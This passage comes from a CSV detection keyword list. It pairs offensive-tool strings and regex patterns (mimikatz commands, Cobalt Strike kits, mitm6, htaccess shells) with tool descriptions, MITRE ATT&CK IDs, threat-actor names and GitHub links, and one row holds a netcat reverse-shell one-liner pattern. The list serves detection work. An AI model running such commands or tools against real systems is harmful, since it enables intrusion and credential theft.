GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52141"
"*misc::wp*",".{0,1000}misc\:\:wp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52142"
"*misc::xor*",".{0,1000}misc\:\:xor.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52143"
"*MISC_HIJACKABLE_DLL*",".{0,1000}MISC_HIJACKABLE_DLL.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","52144"
"*miscbackdoorlnkhelp*",".{0,1000}miscbackdoorlnkhelp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","10","475","73","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z","52145"
"*Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1*",".{0,1000}Misc\-Powershell\-Scripts\/blob\/master\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","52146"
"*Misc-PowerShell-Stuff/blob/master/Invoke-TokenDuplication.ps1*",".{0,1000}Misc\-PowerShell\-Stuff\/blob\/master\/Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","52147"
"*missile-command.txt*",".{0,1000}missile\-command\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52148"
"*MisterDaneel/pysoxy*",".{0,1000}MisterDaneel\/pysoxy.{0,1000}","offensive_tool_keyword","pysoxy","A small Socks5 Proxy Server in Python","T1090","TA0011","N/A","N/A","C2","https://github.com/MisterDaneel/pysoxy","1","1","N/A","N/A","10","10","149","51","2023-10-15T06:12:45Z","2016-04-21T07:56:24Z","52149"
"*MitchHS/DLL-Spoofer*",".{0,1000}MitchHS\/DLL\-Spoofer.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","N/A","9","1","60","7","2025-03-04T14:14:15Z","2023-10-18T14:34:38Z","52150"
"*mitchmoser/SharpShares*",".{0,1000}mitchmoser\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","52151"
"*mitm6 --*",".{0,1000}mitm6\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","52152"
"*mitm6 -d *",".{0,1000}mitm6\s\-d\s.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","0","#linux","N/A","10","10","1778","256","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z","52153"
"*mitm6.py*",".{0,1000}mitm6\.py.{0,1000}","offensive_tool_keyword","mitm6","performs MiTM for IPv6","T1547 - T1557 - T1569 - T1562 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/fox-it/mitm6","1","1","N/A","N/A","10","10","1778","256","2024-02-20T16:11:53Z","2018-01-10T21:27:28Z","52154"
"*mitmdump -*",".{0,1000}mitmdump\s\-.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","52155"
"*mitmdump -s aerosol.py*",".{0,1000}mitmdump\s\-s\saerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","52156"
"*mitmdump*",".{0,1000}mitmdump.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","command-line version of mitmproxy","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52157"
"*MITMf.py*",".{0,1000}MITMf\.py.{0,1000}","offensive_tool_keyword","MITMf","Framework for Man-In-The-Middle attacks","T1557 - T1192 - T1173 - T1185","TA0001 - TA0011 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/MITMf","1","1","N/A","N/A","10","10","3612","1047","2018-08-28T15:44:25Z","2014-07-07T11:13:51Z","52158"
"*mitmproxy*",".{0,1000}mitmproxy.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","N/A","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52159"
"*mitmproxy.rb*",".{0,1000}mitmproxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","52160"
"*mitmsocks*",".{0,1000}mitmsocks.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","0","N/A","N/A","10","1","35","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z","52162"
"*mitmsocks4j*",".{0,1000}mitmsocks4j.{0,1000}","offensive_tool_keyword","mitmsocks4j","Man-in-the-middle SOCKS Proxy for Java","T1557 - T1563 - T1559 - T1588","TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Akdeniz/mitmsocks4j","1","1","N/A","N/A","10","1","35","11","2013-02-14T20:42:37Z","2013-02-10T21:33:52Z","52163"
"*mitmweb*",".{0,1000}mitmweb.{0,1000}","offensive_tool_keyword","mitmproxy","An interactive. SSL-capable man-in-the-middle proxy for HTTP with a console interface","T1557 - T1553 - T1003 - T1556 - T1563","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/mitmproxy/mitmproxy","1","1","#linux #windows","web-based interface for mitmproxy","10","10","38814","4162","2025-04-22T13:29:41Z","2010-02-16T04:10:13Z","52164"
"*mkdir dnskire/*",".{0,1000}mkdir\sdnskire\/.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","52169"
"*mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc *",".{0,1000}mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|\/bin\/sh\s\-i\s2\>\&1\|nc\s.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#linux","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","52170"
"*MlCGkaacS5SRUOt*",".{0,1000}MlCGkaacS5SRUOt.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","52172"
"*mlcsec/FormThief*",".{0,1000}mlcsec\/FormThief.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","1","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","52173"
"*mlcsec/Graphpython*",".{0,1000}mlcsec\/Graphpython.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","52174"
"*mlcsec/SharpGraphView*",".{0,1000}mlcsec\/SharpGraphView.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","52175"
"*mlcsec@proton.me*",".{0,1000}mlcsec\@proton\.me.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#email","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","52176"
"*mobaxtermfox.dll*",".{0,1000}mobaxtermfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","52178"
"*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1564 - T1592 - T1547 - T1562","TA0010 - TA0011 - TA0003 - TA0008","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","0","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","52179"
"*Mobile-Security-Framework*",".{0,1000}Mobile\-Security\-Framework.{0,1000}","offensive_tool_keyword","Mobile-Security-Framework-MobSF","Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis.","T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523","TA0007 - TA0010 - TA0003","N/A","N/A","Framework","https://github.com/MobSF/Mobile-Security-Framework-MobSF","1","1","N/A","N/A","N/A","10","18450","3353","2025-03-29T17:57:28Z","2015-01-31T04:36:01Z","52180"
"*moc.tnetnocresubuhtig.war//:sptth*",".{0,1000}moc\.tnetnocresubuhtig\.war\/\/\:sptth.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","52181"
"*MockDirUACBypass*",".{0,1000}MockDirUACBypass.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","52182"
"*MockDirUACBypassDll*",".{0,1000}MockDirUACBypassDll.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","52183"
"*Mockingjay_BOF.sln*",".{0,1000}Mockingjay_BOF\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","52184"
"*Mockingjay_BOF-main*",".{0,1000}Mockingjay_BOF\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","52185"
"*mod_auth_remote.phish.htaccess*",".{0,1000}mod_auth_remote\.phish\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52186"
"*mod_buster.py*",".{0,1000}mod_buster\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52187"
"*mod_caucho.shell.htaccess*",".{0,1000}mod_caucho\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52188"
"*mod_cgi.shell.bash.htaccess*",".{0,1000}mod_cgi\.shell\.bash\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52189"
"*mod_cgi.shell.bind.htaccess*",".{0,1000}mod_cgi\.shell\.bind\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52190"
"*mod_cgi.shell.windows.htaccess*",".{0,1000}mod_cgi\.shell\.windows\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52191"
"*mod_mono.shell.htaccess*",".{0,1000}mod_mono\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52192"
"*mod_multi.shell.htaccess*",".{0,1000}mod_multi\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52193"
"*mod_nikto.py*",".{0,1000}mod_nikto\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52194"
"*mod_perl.embperl.shell.htaccess*",".{0,1000}mod_perl\.embperl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52195"
"*mod_perl.IPP.shell.htaccess*",".{0,1000}mod_perl\.IPP\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52196"
"*mod_perl.Mason.shell.htaccess*",".{0,1000}mod_perl\.Mason\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52197"
"*mod_perl.shell.htaccess*",".{0,1000}mod_perl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52198"
"*mod_php.shell.htaccess*",".{0,1000}mod_php\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52199"
